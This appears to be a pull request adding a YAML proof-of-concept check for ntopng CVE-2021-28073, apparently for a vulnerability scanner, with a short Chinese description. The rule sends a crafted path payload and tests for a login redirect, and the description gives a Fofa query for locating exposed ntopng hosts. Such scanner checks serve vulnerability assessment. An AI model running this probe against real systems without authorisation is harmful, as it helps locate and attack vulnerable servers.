### PR TITLE
poc-yaml-ntopng-CVE-2021-28073

### DIFF
--- a/pocs/poc-yaml-ntopng-CVE-2021-28073.yaml
+++ b/pocs/poc-yaml-ntopng-CVE-2021-28073.yaml
@@ -1,0 +1,13 @@
+name: poc-yaml-ntopng-cve-2021-28073
+manual: true
+transport: http
+rules:
+  - method: GET
+    path: "//baidu.com/%2f.."
+    follow_redirects: false
+    expression: |
+       response.status==302 &&response.headers['Location'].contains('/lua/login.lua?referer=')
+detail:
+  author: Beard_Lin
+  links:
+    - https://github.com/errorecho/CVEs-Collection/blob/main/CVE-2021-28073


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
poc-yaml-ntopng-CVE-2021-28073
## 测试环境
Fofa: app="ntopng"
## 备注

![1637495779(1)](https://user-images.githubusercontent.com/57062647/142768078-c725b326-7d43-4345-bea9-d65d095d65f0.png)
